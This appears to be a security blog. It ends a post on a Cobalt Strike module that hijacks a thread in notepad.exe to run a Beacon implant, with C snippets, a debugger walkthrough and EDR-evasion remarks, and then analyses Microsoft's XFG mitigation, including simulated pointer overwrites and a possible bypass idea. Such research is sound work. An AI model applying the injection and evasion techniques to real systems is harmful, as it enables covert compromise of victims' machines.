Notice that 0x2000 bytes are subtracted from RSP. @zerosum0x0’s blog post on ThreadContinue uses this approach, to allow breathing room on the stack in order for code to execute, and I decided to adopt it as well in order to avoid heavy troubleshooting.

After that, all there is left to do is to invoke SetThreadContext, ResumeThread, and free!

SetThreadContext

// Set RIP
BOOL setRip = KERNEL32$SetThreadContext(
	desiredThread,
	&cpuRegisters
);

// Error handling
if (!setRip)
{
	BeaconPrintf(CALLBACK_ERROR, "Error! Unable to set the target thread's RIP register. Error: 0x%lx\n", KERNEL32$GetLastError());
}

ResumeThread

// Call to ResumeThread()
DWORD resume = KERNEL32$ResumeThread(
	desiredThread
);

free

// Free the buffer used for the whole payload
MSVCRT$free(
	shellcodeFinal
);

Additionally, you should always clean up handles in your code - but especially in Beacon Object Files, as they are “sensitive”.

// Close handle
KERNEL32$CloseHandle(
	desiredThread
);
// Close handle
KERNEL32$CloseHandle(
	processHandle
);

Debugger Time

Let’s use an instance of notepad.exe as our target process and attach to it in WinDbg.

The PID we want to inject into is 7548 for our purposes. After loading our Aggressor Script developed earlier, we can use the command cThreadHijack 7548 TESTING, where TESTING is the name of the HTTP listener Beacon will interact with.

There we go, our BOF successfully ran. Now, let’s examine what we are working with in WinDbg. As we can see, the address of our final buffer is shown in the Current RIP: 0x1f027f20000 output line. Let’s view this in WinDbg.

Great! Everything seems to be in place. As is shown in the mov rax,offset ntdll!NtContinue instruction, we can see our NtContinue routine. The beginning of the NtContinue routine should call the address of the stack alignment and CreateThread shellcode, as mentioned earlier in this blog post. Let’s see what the address 0x000001f027f20510 references, which is the memory address being called.

Perfect! As we can see by the and rsp, 0FFFFFFFFFFFFFFF0 instruction, along with the address of KERNEL32!CreateThreadStub, the NtContinue routine will first call the stack alignment and CreateThread routines. In this case, we are good to go! Let’s now start walking through execution of the code.

Upon SetThreadContext being invoked, which changes the RIP register to execute our shellcode, we can see that execution has reached the first call, which will invoke the stack alignment and CreateThread routines. Stepping through this call, as we know, will push a return address onto the stack. As mentioned previously, this will be the address of the next instruction, call 0x000001f027f2000a. When the CreateThread routine returns, it will return to this address. After stepping through the instruction, we can see that the address of the next call is pushed onto the stack.

Execution then reaches the bitwise AND instruction. As we can see from the above image, and rsp, 0FFFFFFFFFFFFFFF0 is redundant, as the stack pointer is already 16-byte aligned (the last 4 bits are already set to 0). Stepping through the bitwise XOR operations, RCX and RDX are set to 0.

As we know from the CreateThread prototype, the lpStartAddress parameter is a pointer to our shellcode. Looking at the above image, we can see the third argument, which will be loaded into R8, is 0x1f027ee0000. Unassembling this address in the debugger discloses this is our Beacon implant, which was injected earlier! To verify this, you can generate a raw Beacon stageless artifact in Cobalt Strike manually and run it through hexdump to verify the first few opcodes correspond.

After stepping through the instruction, the value is loaded into the R8 register. The next instruction sets R9 to 0 via xor r9, r9.

Additionally, [RSP + 0x20] and [RSP + 0x28] are set to 0, by copying the value of R9, which is now 0, to these locations. Here is what [RSP + 0x20] and [RSP + 0x28] look like before the mov [rsp + 0x20], r9 and mov [rsp + 0x28], r9 instructions and after.

After, CreateThread is placed into RAX and is called. Note CreateThread is actually CreateThreadStub. This is because most former kernel32.dll functions were placed in a DLL called KERNELBASE.DLL. These “stub” functions essentially just redirect execution to the correct KERNELBASE.dll function.

Stepping over the function, with p in WinDbg, places the CreateThread return value, into RAX - which is a handle to the local thread containing the Beacon implant.

After execution of our NtContinue routine is complete, we will receive the Beacon callback as a result of this thread.

Additionally, we can see that RSP now points to the return address, which is the address of the first “real” instruction of our NtContinue routine. A ret instruction, which is what RIP currently points to, will pop the value at the top of the stack (the value RSP points to) into RIP. Executing the return redirects execution back to the NtContinue routine.

As we can see in the image above, the next call instruction calls the pop rcx instruction. This call instruction, when executed, will push the address of the pop rcx instruction onto the stack, as a return address.

Executing the pop rcx instruction, we can see that RCX now contains the address, in memory, of the pop rcx instruction. This will be the base address used in the RVA calculations to resolve the address of the preserved CONTEXT record.

To verify that our offset is correct, we can use .cxr in WinDbg to check whether the contiguous memory block located at RCX + 0x36 is in fact a CONTEXT record. 0x36 is chosen, as this is the value that is about to be added to RCX, as seen a few screenshots ago. Verifying with WinDbg, we can see this is the case.

If this had not been the correct location of the CONTEXT record, the .cxr command would have failed, as the memory block would not have been parsed correctly.

Now that we have verified our CONTEXT record is in the correct place, we can perform the RVA calculation to add the correct distance to the CONTEXT record, meaning the pointer is then stored in RCX, fulfilling the PCONTEXT parameter of NtContinue.
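The address arithmetic above can be sketched in a few lines of Python. This is only a toy model: the call address is made up, and the 5-byte call length assumes a near relative call (E8 plus a 32-bit displacement), which is an assumption and not something shown in the screenshots. The 0x36 offset is the one from the walkthrough.

```python
# Toy model of the call/pop trick. The address below is hypothetical.
CONTEXT_OFFSET = 0x36  # distance from `pop rcx` to the CONTEXT record, per the walkthrough


def call_pop_base(call_address, call_length=5):
    """Model a call to the next instruction followed by `pop rcx`.

    call_length=5 assumes a near relative call encoding (an assumption).
    """
    stack = []
    return_address = call_address + call_length  # address of the `pop rcx` instruction
    stack.append(return_address)                 # `call` pushes the return address
    rcx = stack.pop()                            # `pop rcx` reads it straight back
    return rcx


def context_pointer(call_address):
    """Value held in RCX after adding 0x36: the PCONTEXT argument for NtContinue."""
    return call_pop_base(call_address) + CONTEXT_OFFSET


if __name__ == "__main__":
    hypothetical_call_address = 0x1000
    print(hex(context_pointer(hypothetical_call_address)))
```

The point of the trick is that the routine never needs to know where it was written in memory. Everything is resolved relative to the address that the call instruction pushed.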

Stepping through xor rdx, rdx, which sets the RaiseAlert parameter of NtContinue to FALSE, execution lands on the call rax instruction, which will call NtContinue.

Pressing g in the debugger then shows us that quite a few DLLs are mapped into notepad.exe.

This is the Beacon implant resolving needed DLLs for various function calls - meaning our Beacon implant has been executed! If we go back into Cobalt Strike, we can see we now have a Beacon in context of notepad.exe with the same PID of 7548!

Additionally, you will notice on the victim machine that notepad.exe is fully functional! We have successfully forced a remote thread to execute our payload and restored it, all in one go.

Final Thoughts

Obviously, this technique isn’t without its flaws. There are still IOCs for this technique, including invoking SetThreadContext, amongst other things. However, this does avoid invoking any sort of action that creates a remote thread, which is still useful in most situations. This technique could be taken further, perhaps by invoking direct system calls instead of these APIs, which are susceptible to hooking by most EDR products.

Additionally, one thing to note is that since this technique suspends a thread and then resumes it, you may have to wait anywhere from a few moments to a few minutes for the thread to get around to executing. Interacting with the process directly will force execution, but targeting Windows processes that execute frequently is also a good way to avoid long waits.

I had a lot of fun implementing this technique into a BOF and I am really glad I have a reason to write more C code! Like always: peace, love, and positivity :-).

Exploit Development: Between a Rock and a (Xtended Flow) Guard Place: Examining XFG

23 August 2020 at 00:00

Introduction

Previously, I have blogged about ROP and the benefits of understanding how it works. Not only is it a viable first-stage payload for obtaining native code execution, but it can also be leveraged for things like arbitrary read/write primitives and data-only attacks. Unfortunately, if your end goal is native code execution, there is a good chance you are going to need to overwrite a function pointer in order to hijack control flow. Taking this into consideration, Microsoft implemented Control Flow Guard, or CFG, as an optional update back in Windows 8.1. Although it was released before Windows 10, it did not really catch on in terms of “mainstream” exploitation until recent years.

After a few years, and a few bypasses along the way, Microsoft decided they needed a new Control Flow Integrity (CFI) solution- hence XFG, or Xtended Flow Guard. David Weston gave an overview of XFG at his talk at BlueHat Shanghai 2019, and it is pretty much the only public information we have at this time about XFG. This “finer-grained” CFI solution will be the subject of this blog post. A few things before we start about what this post is and what it isn’t:

  1. This post is not an “XFG internals” post. I don’t know every single low level detail about it.
  2. Don’t expect any bypasses from this post- this mitigation is still very new and not very explored.
  3. We will spend a bit of time understanding what indirect function calls are via function pointers, what CFG is, and why XFG is a very, very nice mitigation (IMO).

This is simply going to be an “organized brain dump” and isn’t meant to be a “learn everything you need to know about XFG in one sitting” post. This is just simply documenting what I have learned after messing around with XFG for a while now.

The Blueprint for XFG: CFG

CFG is a pretty well documented exploit mitigation, and I have done my fair share of documenting it as well. However, for completeness’ sake, let’s talk about how CFG works and its potential shortcomings.

Note that before we begin, Microsoft deserves recognition for being one of the leaders in implementing a Control Flow Integrity (CFI) initiative and among the first to actually release a CFI solution.

Firstly, to enable CFG, a program is compiled and linked with the /guard:cf flag. This can be done through the Microsoft Visual Studio tool cl (which we will look at later). However, more easily, this can be done by opening Visual Studio and navigating to Project -> Properties -> C/C++ -> Code Generation and setting Control Flow Guard to Yes (/guard:cf).

CFG at this point would now be enabled for the program- or in the case of Microsoft binaries, they would already be CFG enabled (most of them). This causes a bitmap to be created, which essentially is made up of all functions within the process space that are “protected by CFG”. Then, before an indirect function call is made (we will explore what an indirect call is shortly if you are not familiar), the function being called is sent to a special CFG function. This function checks to make sure that the function being called is a part of the CFG bitmap. If it is, the call goes through. If it isn’t, the call fails.
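To make the idea of a bitmap lookup a little more concrete, here is a minimal Python sketch. It is a conceptual model only: the 64 KB address space, the one-bit-per-16-byte-slot layout, and the names CfgBitmap and checked_indirect_call are all assumptions made for illustration, not the real CFG bitmap format.

```python
ADDRESS_SPACE = 0x10000  # assumption: tiny address space to keep the model small
SLOT_SIZE = 16           # assumption: one bit per 16-byte slot


class CfgBitmap:
    """Conceptual stand-in for the CFG bitmap (not the real layout)."""

    def __init__(self):
        self.bits = bytearray(ADDRESS_SPACE // SLOT_SIZE // 8)

    def _locate(self, address):
        slot = address // SLOT_SIZE
        return slot // 8, 1 << (slot % 8)

    def mark_valid(self, address):
        byte_index, mask = self._locate(address)
        self.bits[byte_index] |= mask

    def is_valid(self, address):
        # Unaligned or out-of-range addresses are rejected in this model.
        if address % SLOT_SIZE or not 0 <= address < ADDRESS_SPACE:
            return False
        byte_index, mask = self._locate(address)
        return bool(self.bits[byte_index] & mask)


def checked_indirect_call(bitmap, address):
    """Model the check performed before an indirect call goes through."""
    if not bitmap.is_valid(address):
        raise RuntimeError("CFG check failed for %#x" % address)
    return address  # the call would go through to this target


if __name__ == "__main__":
    bitmap = CfgBitmap()
    bitmap.mark_valid(0x1000)  # hypothetical address of a protected function
    print(hex(checked_indirect_call(bitmap, 0x1000)))
```

The lookup is a couple of shifts and a mask, which is one way to see why a bitmap keeps the cost of the check so low.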

Since this is a post about XFG, not CFG, we will skip over the technical details of CFG. However, if you are interested to see how CFG works at a lower level, Morten Schenk has an excellent post about its implementation in user mode (the Windows kernel has been compiled with CFG, known as kCFG, since Windows 10 1703. Note that Virtualization-Based Security, or VBS, is required for kCFG to be enforced. However, even when VBS is disabled, kCFG has some limited functionality. This is beyond the scope of this blog post).

Moving on, let’s examine how an indirect function call (e.g. call [rax] where RAX contains a function address or a function pointer), which initiates a control flow transfer to a different part of an application, looks without CFG or XFG. To do this, let’s take a look at a very simple program that performs a control flow transfer.

Note that you will need Microsoft Visual Studio 2019 Preview 16.5 or greater in order to follow along.

Let’s talk about what is happening here. Firstly, this code is intentionally written this way and is obviously not the most efficient way to do this. However, it is done this way to help simulate a function pointer overwrite and the benefits of XFG/CFG.

Firstly, we have a function called void cfgTest() that just prints a sentence. This function is then assigned to a function pointer called void (*cfgTest1), which actually is an array. Then, in the main() function, the function pointer void (*cfgTest1) is executed. Since void (*cfgTest1) is pointing to void cfgTest(), this will cause void (*cfgTest1) to simply execute void cfgTest(). This will create a control flow transfer, as the main() function will perform a call through the void (*cfgTest1) function pointer, which will then call the void cfgTest() function.

To compile with the command line tool cl, type in “x64 Native Tools Command Prompt for VS 2019 Preview” in the Start menu and run the program as an administrator.

This will drop you into a special Command Prompt. From here, you will need to navigate to the installation path of Visual Studio, and you will be able to use the cl tool for compilation.

Let’s compile our program now!

The above command essentially compiles the program with the /Zi flag and the /INCREMENTAL:NO linking option. Per Microsoft Docs, /Zi is used to create a .pdb file for symbols (which will be useful to us). /INCREMENTAL:NO has been set to instruct cl not to use the incremental linker. This is because the incremental linker is essentially used for optimization, which can create things like jump thunks. Jump thunks are essentially small functions that only perform a jump to another function. An example would be, instead of call function1, the program would actually perform a call j_function1. j_function1 would simply be a function that performs a jmp function1 instruction. This functionality will be turned off for brevity. Since our “dummy program” is so simple, it will be optimized very easily. Knowing this, we are disabling incremental linking in order to simulate a “Release” build (we are currently building “Debug” builds) of an application, where incremental linking would be disabled by default. However, none of this is really relevant here- just a point of clarification for the reader. Just know we are doing it for our purposes.

The result of the compilation command will place the output file, named Source.exe in this case, into the current directory along with a symbol file (.pdb). Now, we can open this application in IDA (you’ll need to run IDA as an administrator, as the application is in a privileged directory). Let’s take a look at the main() function.

Let’s examine the assembly above. The above function loads the void (*cfgTest1) function pointer into RCX. Since void (*cfgTest1) is a function pointer to an array, the value in RCX itself isn’t what is needed to jump to the array. Only when RCX is dereferenced in the call qword ptr [rcx+rax] instruction does program execution actually perform a control flow transfer to void (*cfgTest1)’s first index- which is void cfgTest(). This is why call qword ptr [rcx+rax] is being performed, as RAX is the position in the array that is being indexed.
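If the dereference is hard to picture, the following Python sketch models it. All addresses are hypothetical, and treating RAX as a byte offset of index * 8 is an assumption about how the array is indexed. The key idea is that RCX only holds the address of the array, and the call target is the 8-byte value stored there.

```python
import struct


def cfg_test():
    return "cfgTest executed"


# Hypothetical map of code addresses to functions in the process.
CODE = {0x401000: cfg_test}

# Hypothetical function pointer array: one little-endian 8-byte pointer per entry.
TABLE_BASE = 0x404000
MEMORY = {TABLE_BASE: struct.pack("<Q", 0x401000)}


def call_qword_ptr(rcx, rax):
    """Model `call qword ptr [rcx+rax]`: dereference first, then transfer control."""
    (target,) = struct.unpack("<Q", MEMORY[rcx + rax])
    return CODE[target]()


if __name__ == "__main__":
    index = 0
    print(call_qword_ptr(TABLE_BASE, index * 8))
```

This also hints at why a function pointer overwrite is so attractive. Changing the 8 bytes stored at TABLE_BASE changes where the call lands, without touching any code.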

Taking a look at the call instruction in IDA, we can see that clearly this will redirect program execution to void cfgTest().

Additionally, in WinDbg, we can see that Source!cfgTest1, which is a function pointer, points to Source!cfgTest.

Nice! We know that our program will redirect execution from main() to void (*cfgTest1) and then to void cfgTest()! Let’s say as an attacker, we had an arbitrary write primitive and we were able to overwrite what void (*cfgTest1) points to. We could actually change where the application actually ends up calling! This is not good from a defensive perspective.

Can we mitigate this issue? Let’s go back and recompile our application with CFG this time and find out.

This time, we add /guard:cf as a flag, as well as a linking option.

Disassembling the main() function in IDA again, we notice things look a bit different.

Very interesting! Instead of making a call directly to void (*cfgTest1) this time, it seems as though the function __guard_dispatch_icall_fptr will be invoked. Let’s set a breakpoint in WinDbg on main() and see how this looks after invoking the CFG dispatch function.

After setting a breakpoint on the main() function, code execution hits the CFG dispatch function.

The CFG dispatch function then performs a dereference and jumps to ntdll!LdrpDispatchUserCallTarget.

We won’t get into the technical details about what happens here, as this post isn’t built around CFG and Morten’s blog already explains what will happen. But essentially, at a high level, this function will check the CFG bitmap for the Source.exe process and determine if the void cfgTest() function is a valid target (a.k.a if it’s in the bitmap). Obviously this function hasn’t been overwritten, so we should have no problems here. After stepping through the function, control flow should transfer back to the void cfgTest() function seamlessly.

Execution has returned back to the void cfgTest() function. Additionally what is nice, is the lack of overhead that CFG put on the program itself. The check was very quick because Microsoft opted to use a bitmap instead of indexing an array or some other structure.

You can also see what functions are protected by the CFG bitmap by using the dumpbin tool within the Visual Studio installation directory and the special Visual Studio Command Prompt. You can use the command dumpbin /loadconfig APPLICATION.exe to view this.

Let’s see if we can take this even further and potentially show why XFG is definitely a better/more viable option than CFG.

CFG: Potential Shortcomings

As mentioned earlier, CFG checks functions to make sure they are part of the “CFG bitmap” (a.k.a protected by CFG). This means a few things from an adversarial perspective. If we were to use VirtualAlloc() to allocate some virtual memory, and overwrite a function pointer that is protected by CFG with the returned address of the allocation- CFG would make the program crash.

Why? VirtualAlloc() (for instance) would return a virtual address of something like 0xdb0000. When the application in question was compiled with CFG, obviously this memory address wasn’t a part of the application. Therefore, this address wouldn’t be “protected by CFG” and the program would crash. However, this is not very practical. Let’s think about what an adversary tries to accomplish with ROP.

Adversaries want to return into a Windows API function like VirtualProtect() in order to dynamically change permissions of memory. What is interesting about CFG is that in addition to the program’s functions, all exported Windows functions that make up the “module” import list for a program can be called. For instance, the application we are looking at is called Source.exe. Dumping the loaded modules for the application, we can see that KERNELBASE.dll, kernel32.dll, and ntdll.dll (which are the usual suspects) are loaded for this application.

Let’s see if/how this could be abused!

Let’s firstly update our program with a new function.

This program works exactly as the program before, except the function void protectMe2() is added in to add another user defined function to the CFG bitmap. Note that this function will never be executed, and that is poor from a programmer’s perspective. However, this function’s sole purpose is to just show another protected function. This can be verified again with dumpbin.

Here, we can see that Source!cfgTest1 still points to Source!cfgTest.

Let’s recall what was said earlier about how CFG only validates if a function resides within the CFG bitmap or not. Let’s now perform a simulated arbitrary write condition in WinDbg to overwrite what Source!cfgTest1 points to, with Source!protectMe2.

The above command uses x to show the address of the Source!protectMe2 function and then uses dps to show that Source!cfgTest1 still points to Source!cfgTest. Then, using ep, we overwrite the function pointer. dps once again verifies that the function pointer overwrite has occurred.

Let’s now step through the program to see what happens. Program execution firstly hits the CFG dispatch function.

Looking at the RAX register, which is used to hold the address of the function CFG will check, we see it has been overwritten with Source!protectMe2 instead of Source!cfgTest.

Execution then hits ntdll!LdrpDispatchUserCallTarget. After walking the function, which validates if the in scope function resides within the CFG bitmap for the process, execution redirects to Source!protectMe2!

This is very interesting from an adversarial perspective, as we were successfully able to overwrite a function pointer and CFG didn’t terminate our process! The only caveat being that the function is a part of the current process’s CFG bitmap.

What is even more interesting, is that function pointers protected by CFG can be overwritten by any exported function at runtime! Let’s rework this example, but try to call a Windows API function like KERNELBASE!WriteProcessMemory.

First, we simulate the arbitrary write by overwriting Source!cfgTest1 with KERNELBASE!WriteProcessMemory.

Program execution passes through Source!__guard_dispatch_icall_fptr and ntdll!LdrpDispatchUserCallTarget and we can clearly see execution is redirected to KERNELBASE!WriteProcessMemory.

This shows that even with CFG enabled, it is still possible to call functions that have overwritten other functions. This is not good, as calls can still be made with malign intent. Additionally, calling functions of different types out of context may result in a type confusion or other programmatic behavioral problems.
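The behavior we just walked through can be summed up in a short Python sketch. The function names mirror the ones used in this post, but everything here is a stand-in: CFG_VALID is a hypothetical set playing the role of the bitmap, and write_process_memory_stub and attacker_allocation are placeholders that do nothing dangerous.

```python
def cfg_test():
    return "cfgTest"


def protect_me2():
    return "protectMe2"


def write_process_memory_stub():
    return "WriteProcessMemory (stand-in)"


def attacker_allocation():
    return "attacker controlled memory (stand-in)"


# Hypothetical stand-in for the CFG bitmap: every target CFG considers valid.
CFG_VALID = {cfg_test, protect_me2, write_process_memory_stub}


def dispatch(pointer):
    """Model the CFG dispatch: only membership is checked, not who was meant to be called."""
    if pointer not in CFG_VALID:
        raise RuntimeError("CFG: invalid call target")
    return pointer()


def simulate_overwrites():
    results = []
    for replacement in (protect_me2, write_process_memory_stub, attacker_allocation):
        cfg_test1 = replacement  # simulated arbitrary write over the function pointer
        try:
            results.append(dispatch(cfg_test1))
        except RuntimeError:
            results.append("blocked")
    return results


if __name__ == "__main__":
    print(simulate_overwrites())
```

Only the pointer into memory that CFG knows nothing about is blocked. Any other valid target passes, regardless of whether the call site was ever meant to reach it.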

Now that we have armed ourselves with an understanding of why CFG is an amazing start to solving the CFI problem, but yet still contains many shortcomings, let’s get into XFG and what makes it better and different.

XFG: The Next Era of CFI for Windows

Let’s start out by talking about what XFG is at a high level. After we go through some high level details about XFG, we will compile our program with XFG and walk through the dispatch function(s), as well as perform some simulated function pointer overwrites to see how XFG reacts and additionally see how XFG differs from CFG.

My last CrowdStrike blog post touches on XFG, but not in too much detail. XFG essentially is a more “hardened” version of CFG. How so? XFG, at compile time, produces a “type-based hash” of a function that is going to be called in a control flow transfer. This hash will be placed 8 bytes above the target function, and will be compared against a preserved version of that hash when an XFG dispatch function is executed. If the hashes match, control flow transfer is then passed to the in scope function that was checked. If the hashes differ, the program crashes.
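Here is a minimal Python sketch of that idea. To be clear, this is not the real XFG hashing algorithm: truncating SHA-256 of a prototype string to 64 bits is an assumption made purely so there is something to compare, and the Function class and xfg_call helper are hypothetical names. The extra bit that gets set in the stored hash is ignored here.

```python
import hashlib


def type_hash(prototype):
    """Stand-in for the compile-time type-based hash (NOT the real XFG algorithm)."""
    digest = hashlib.sha256(prototype.encode()).digest()
    return int.from_bytes(digest[:8], "little")


class Function:
    def __init__(self, name, prototype):
        self.name = name
        # Models the hash that sits 8 bytes above the function.
        self.stored_hash = type_hash(prototype)


def xfg_call(call_site_prototype, target):
    """Compare the hash preserved at the call site with the target's stored hash."""
    expected = type_hash(call_site_prototype)
    if target.stored_hash != expected:
        raise RuntimeError("XFG hash mismatch")
    return target.name


if __name__ == "__main__":
    cfg_test = Function("cfgTest", "void(void)")
    print(xfg_call("void(void)", cfg_test))
```

The difference from CFG is that a target being valid is no longer enough. The target also has to carry the hash the call site expects.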

Let’s take a look a bit more at this. Firstly, let’s compile our program with XFG!

Note that you will need Visual Studio 2019 Preview + at least Windows 10 21H1 in order to use XFG. Additionally, XFG is not found in the GUI compilation options.

Using the /guard:xfg flag in compilation and linking, we can enable XFG for our application.

Notice that even though it was not selected, CFG is still enabled for our application.

Let’s crack open IDA again to see how the main() function looks with the addition of XFG.

Very interesting! Firstly, we can see that R10 takes in the value of the XFG “type-based” hash. Then, a call is performed to the XFG dispatch call __guard_xfg_dispatch_icall_fptr. Note that the hash has been deemed “immutable” by Microsoft and cannot be modified by an attacker, due to its read only state.

In the image below, the location of the XFG hash is at 00007ff7ded4110c.

We can see that this address is executable (obviously) and readable- with the ability to write disabled.

Additionally, you can use the dumpbin tool to print out the functions protected by CFG/XFG. Functions protected by XFG are denoted with an X.

Before we move on, one interesting thing to note is that the XFG hash is already placed 8 bytes above an XFG protected function BEFORE any code execution actually occurs.

For instance, Source!cfgTest is an XFG protected function. 8 bytes above this function is the hash seen in the previous image, but with an additional bit set.

We will see why this additional bit has been set when we step through the functions that perform XFG checks.

Moving on, let’s step through this in WinDbg to see what we are working with here, and how execution flow will go.

Firstly, execution lands on the XFG dispatch function.

This time, when the __guard_xfg_dispatch_icall_fptr function is dereferenced, a jump to the function ntdll!LdrpDispatchUserCallTargetXFG is performed.

Firstly, a bitwise OR of the XFG hash and 1 occurs, with the result placed in R10. In our case, this sets a bit in the XFG function hash.

Next, a test al, 0xf operation occurs, which performs a bitwise AND between the lower 8 bits of AX (AL) and 0xf.

As we can see from the image above, this sets the zero flag in our case. Additionally, now we have reached a possible jump within ntdll!LdrpDispatchUserCallTargetXFG

Since the zero flag has been set, we will NOT take the jump and instead move on to the next instruction, test ax, 0xFFF.

Stepping through test ax, 0xFFF, which will perform a bitwise AND between the lower 16 bits of RAX (AX) and 0xFFF and set the zero flag accordingly, we see that we have cleared the zero flag in the image below. This means the jump will not occur, and we continue to move deeper into the ntdll!LdrpDispatchUserCallTargetXFG function.

Finally, we land on the cmp instruction which compares the hash 8 bytes above RAX (our target function) with the hash preserved in R10.

The compare statement, because the values are equal, causes the zero flag to be set. This skips the next jump, and performs the final jump to our target function in RAX!
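The path we just stepped through can be modeled in Python as follows. This is only a sketch of the instructions covered above: the hash value and target address are hypothetical, memory is a small bytearray, and the two branches that were not taken in our run are left as labeled placeholders because this post does not walk through them.

```python
import struct


def xfg_dispatch_model(memory, rax, r10):
    """Follow the path through the XFG dispatch routine described above."""
    r10 |= 1                # or r10, 1: set the low bit of the call-site hash
    if rax & 0xF:           # test al, 0xf: ZF clear would take the first jump
        return "first jump taken (path not covered here)"
    if (rax & 0xFFF) == 0:  # test ax, 0xfff: ZF set would take the second jump
        return "second jump taken (path not covered here)"
    (stored,) = struct.unpack_from("<Q", memory, rax - 8)  # hash 8 bytes above target
    if stored != r10:       # cmp [rax-8], r10
        return "hash mismatch"
    return "jmp rax"


def build_memory(function_address, stored_hash, size=0x1000):
    """Place a stored hash 8 bytes above a hypothetical function address."""
    memory = bytearray(size)
    struct.pack_into("<Q", memory, function_address - 8, stored_hash)
    return memory


CALL_SITE_HASH = 0x1122334455667870  # hypothetical value, low bit clear
TARGET = 0x110                       # hypothetical, 16-byte aligned address
MEMORY = build_memory(TARGET, CALL_SITE_HASH | 1)

if __name__ == "__main__":
    print(xfg_dispatch_model(MEMORY, TARGET, CALL_SITE_HASH))
```

Because the stored copy already has the low bit set, the OR with 1 is what makes the call-site hash and the stored hash line up at the compare.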

This is how a function protected by XFG is checked! Let’s now edit our code a bit and explore XFG a bit more.

Let’s Keep Going!

Recall that an XFG hash is made up of a function’s return type and any parameters. Let’s update our code to invoke another function of a different type.

We have changed the protectMe2() function to a function that returns an integer and takes a parameter of the type integer. This is different than our void cfgTest() function. We also set a function pointer, int (*cfgTest2) equal to the int protectMe2() function in order to create a new XFG hash for a different function type (int in this case). Let’s recompile our program and disassemble it in IDA to see how the two functions may vary from an XFG perspective.

Very interesting! As we can see from the above image, there are two different hashes now. The hash for our original function has remained the same. However, the hash for the int protectMe2() function is very different, but the last 12 bits of each hash in hexadecimal are 870 in our case. This is interesting and may be worth noting.

Additionally, static and dynamic analysis both show that even before any code has executed, the actual hash is already placed 8 bytes above each function. The hashes also already have an additional bit set, just as we saw last time.

Let’s take this opportunity to showcase why XFG is significantly stronger than CFG.

Let’s simulate an arbitrary write again by overwriting what Source!cfgTest1 points to with Source!protectMe2.

After simulating the arbitrary write, we pick up execution in ntdll!LdrpDispatchUserCallTargetXFG again. Stepping through a few instructions, we once again land on the cmp instruction which checks to see if the preserved XFG hash matches the current XFG hash.

As we can see below, the hashes do not match!

Since the hashes do not match, this will cause XFG to determine a function pointer has been overwritten with something it should not have been overwritten with- and causes a program crash. Even though the function pointer was overwritten by another function within the same bitmap- XFG still will crash the process.

Let’s examine another scenario, with two functions of the same return type- but not the same amount of parameters.

To achieve this, our code has been edited to the following.

As we can see from the above image, we are using all integer functions now. However, the int cfgTest() function has two more parameters than the int protectMe2() function. Let’s compile and perform some static analysis in IDA.

The only difference between the two functions protected by XFG is the amount of parameters that int cfgTest() has, and yet the hashes are TOTALLY different. From a defensive perspective, it seems like even very similar functions are viewed as “very different”.

Additionally, we notice that the last 12 bits of the int cfgTest() hash have become 371 in hexadecimal instead of the previously mentioned 871 value. This means that XFG hashes seem to be unique until the last 8 bits. This is indicative of the hash only being unique up until about 56 bits.

As a sanity check and for completeness’ sake, let’s see what happens when two identical functions are assigned an XFG hash.

OMG Samesies!

Here is an edited version of our code, with two identical functions.

Disassembling the functions in IDA, we can see that the hashes this time are identical.

Obviously, since the hashing process for an XFG hash takes a function prototype and hashes it, the two hashes are going to be the same. I would not call this a flaw at all, because it is obvious Microsoft knew this going in. However, I feel this is a nice win for Microsoft in terms of their overall CFI strategy because as David pointed out, this was very little overhead to the already existing CFG infrastructure.

However, from an adversarial standpoint- it must be said. XFG protected function pointers can be overwritten, so long as the new function has a prototype identical to that of the original function.

Potential Bypasses?

As mentioned above, utilizing functions of identical prototypes generates identical XFG hashes. Knowing this, it seems as though it could be possible to overwrite a function pointer with a function of the same prototype. Even so, this is SIGNIFICANTLY stronger than CFG in terms of what functions can actually be called.

Let’s talk about one more potential bypass.

As we know, functions protected by XFG have an XFG hash placed above them (8 bytes above to be more specific). What would happen, for instance, if we performed a function pointer overwrite and called into the middle of a function, like KERNELBASE!VirtualProtect?

As we can see from the above image, calling into the middle of this function shows us that these hex numbers are being interpreted as opcodes, not memory addresses. This means that if XFG checks if a function pointer is overwritten by KERNELBASE!VirtualProtect, it would load the address of this function into RAX per the usual routine for XFG/CFG function checks. Then, this address is dereferenced at an offset of negative 8 to perform the XFG check. When this dereference happens, since this address contains opcodes, the opcodes that are present when calling into the middle of the function will be used in the XFG check.

Let’s perform a function pointer overwrite.

Note that the machine was restarted in between screenshots, causing addresses to change (but the symbols will remain the same).

Next, let’s step through the XFG dispatch functions and reach the compare statement.

Hitting the compare statement, we can see that R10 contains the preserved XFG hash, while RAX just contains the address of KERNELBASE!VirtualProtect + 0x50.

Taking a look at RAX - 8, where the XFG check occurs, we can see that the opcodes that reside within KERNELBASE!VirtualProtect are being treated as the “compared hash”.

Although this compare will fail, this brings up an interesting point.

Since calling into the middle of a function results in the function’s data being treated as opcodes and not memory addresses (usually), it may be possible for an adversary to utilize an arbitrary read/write primitive to do the following.

  1. Locate the XFG hash for a function you want to overwrite
  2. Perform a loop to dereference the process space’s memory and look for patterns that are identical to the XFG hash (remember, we still have to abide by CFG’s rules and choosing a function exported by the application or a function that is additionally located in the same bitmap)
  3. Overwrite the function pointer with any viable candidates
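The search described in the steps above boils down to a byte pattern scan. The sketch below runs against a synthetic buffer only: find_hash_candidates, its base parameter, and the is_cfg_valid predicate are hypothetical names made up for illustration, and the hash value is made up as well.

```python
import struct


def find_hash_candidates(image, xfg_hash, base=0, is_cfg_valid=lambda address: True):
    """Return addresses whose preceding 8 bytes equal the given hash.

    image is a bytes object standing in for memory that has already been read,
    and is_cfg_valid is a caller-supplied stand-in for CFG's own rules.
    """
    pattern = struct.pack("<Q", xfg_hash)
    candidates = []
    position = image.find(pattern)
    while position != -1:
        target = base + position + 8  # the check reads the 8 bytes above the target
        if is_cfg_valid(target):
            candidates.append(target)
        position = image.find(pattern, position + 1)
    return candidates


if __name__ == "__main__":
    fake_hash = 0x1122334455667871  # hypothetical hash value
    pattern = struct.pack("<Q", fake_hash)
    synthetic = bytes(0x18) + pattern + b"\xc3" + bytes(0x10) + pattern + b"\x90"
    print([hex(address) for address in find_hash_candidates(synthetic, fake_hash, base=0x1000)])
```

Even in this toy form, the filter matters. A pattern match is only interesting if the address after it would also pass CFG, which is why viable candidates are expected to be extremely rare.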

Although you most likely are going to be very hard pressed to find anything identical to the hash in terms of opcodes in the middle of a function AND additionally make whatever you find useful from an attacker’s perspective, this is still possible it seems.

Final Thoughts

